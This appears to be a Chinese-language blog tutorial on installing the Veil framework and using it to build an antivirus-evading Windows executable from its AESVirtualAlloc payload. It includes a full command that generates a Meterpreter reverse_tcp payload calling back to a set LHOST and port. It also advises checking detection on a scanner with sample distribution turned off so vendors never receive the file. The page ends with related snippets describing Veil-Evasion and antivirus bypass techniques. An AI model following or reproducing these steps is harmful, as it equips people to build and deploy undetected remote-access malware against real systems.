git地址:https://github.com/ChrisTruncer/Veil/
# wget https://github.com/ChrisTruncer/Veil/archive/master.zip
# unzip master.zip
# cd Veil-master/setup
# ./setup.sh
# rm -rf setup
运行./Veil
list命令查看荷载内容
本文使用python/AESVirtualAlloc荷载。
use python/AESVirtualAlloc
使用generate命令来生成可执行文件
选择一些默认值。回答一些关于荷载的问题后,Veil将会提问一些关于你想创建的可执行文件的问题。首先提供一个可执行文件的名字,然后指明用PyInstaller或py2exe来创建可执行文件。
选择PyInstaller之后,Veil负责剩下的工作。
使用
http://vscan.novirusthanks.org来检测文件,点击“Do not distribute the sample”
可以使用
./Veil.py -l python -p AESVirtualAlloc -o trytofindthis --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.187.100 LPORT=443
来完成工作。
- 大小: 94.6 KB
- 大小: 118.6 KB
- 大小: 93.8 KB
- 大小: 130.5 KB
- 大小: 126.4 KB
- 大小: 173 KB
分享到:
相关推荐
此外,还有**Veil-Evasion**,这是一个基于Python的框架,专门设计用于创建和测试绕过杀毒软件的payload。Veil-Evasion允许安全研究人员编写或修改代码,生成不会触发杀软警报的有效载荷。该框架包含了多种绕过技术...
Veil-Evasion的主要目的是帮助安全研究人员和渗透测试人员创建能够绕过常见防病毒软件和安全解决方案的恶意软件payload。这个工具的出现使得合法的安全测试过程能够更加隐蔽,从而有效地模拟黑客攻击行为,检测组织...
在躲避杀毒软件方面,Veil-Evasion采用了多种策略。其中包括但不限于动态代码生成、API混淆、进程注入等技术。动态代码生成允许payload在运行时才生成其实际执行代码,使得静态分析工具难以检测。API混淆则是通过...
【免杀工具--veil-evasion】是一种在网络安全领域中常用的工具,主要用于对抗反病毒软件和入侵检测系统,使得恶意代码能够避开检测并执行。它通常被安全研究人员、渗透测试人员以及恶意攻击者使用,目的是为了提升...
Veil-master.zip是一个压缩文件,通常包含一个名为"Veil-master"的项目或代码库,这可能是一个开源软件或工具,特别与Linux操作系统相关。在Linux环境中,这种类型的文件经常被用于分发开源软件源代码或者配置文件集...
Veil-Catapult是Veil-Evasion框架的一部分,Veil-Evasion是一个Python驱动的框架,用于创建逃避传统反病毒软件的payloads。它的目标是帮助安全研究人员和渗透测试者在目标环境中部署payloads,同时避免被安全软件...
**Veil-Evasion**是一款功能强大的渗透测试工具,主要用于生成能够绕过多种防病毒软件的Payload,这使其成为进行高级持续性威胁(APT)攻击时的理想选择。该工具不仅能够生成与Metasploit兼容的Payload,还具备强大...
eil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。在kali 2018.1中Veil默认是没有安装的,所以在常用中安装Veil对Metasploit的payload免杀是很重要的。
Veil是一种高级的渗透测试框架,专为红队操作和安全研究人员设计,它允许用户创建、管理和执行定制的payloads,以绕过反病毒软件和其他防御机制。Veil依赖文件是Veil框架运行所必需的一系列组件,这些组件通常包括库...
总的来说,Veil-Evasion是一个强大的工具,它提供了一种方法来绕过传统的安全防护措施,从而更好地模拟高级攻击行为。然而,由于其性质,它应该只被用于合法的渗透测试和安全研究,不能用于非法活动。理解和正确使用...
Veil-Pillage, 面纱抢劫是一种与面纱回避相结合的邮政 #Veil-Pillage面纱抢劫是一个邮政开发框架和一个组成部分的头纱框架。veil pillage由 @harmj0y 构建,目前由 @harmj0y 和团队的帮助支持,目前处于活动状态。...
Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,...
在上一篇文章中,我们了解到如何使用Veil生成C/meterpreter类型的payload,并对其进行了初步分析。Meterpreter是一种强大的后渗透阶段的远程shell,它允许攻击者在目标系统上执行多种操作,如文件管理、进程控制、...
在渗透测试中,AutoIt可以用来创建自定义的交互式界面或模拟用户操作,以执行某些功能或绕过安全控制。 2. **RubyInstaller-1.8.7-p371.exe**:这是Ruby编程语言的安装程序,Ruby是许多安全工具和框架的基础,包括...
- **使用-b选项**:通过指定-b选项,可以在生成shellcode时避免某些特定字符的出现,这些字符可能是被杀毒软件特别关注的对象。 - **使用-e选项**:通过指定-e选项,可以选择不同的编码器对shellcode进行编码处理...
算法与构造Veil使用ChaCha20Poly1305进行身份验证加密,使用Ristretto255 / XDH进行密钥协议和身份验证,使用Elligator2进行难以区分的公共密钥编码,并使用HKDF-SHA-256进行密钥派生。 ChaCha20Poly1305快速,深入...
我写了一些东西来绕过Windows计算机上的AV,这是基于内存技术,常规msf有效负载EXES和Veil-Framework EXES标记Powershell的。 这只是为了突出AV信任使用.Net Assesmblies生成的有效负载的风险。 它不是漏洞,而是...
VEIL网站去做使用正确的语言环境名称: : 什么是尾风? “ Tailwind是一种实用程序优先CSS框架,用于快速构建自定义用户界面。” –建立逆风使用清除未使用CSS 运行缩小CSS 建造杰基尔运行进行实时重新加载什么是...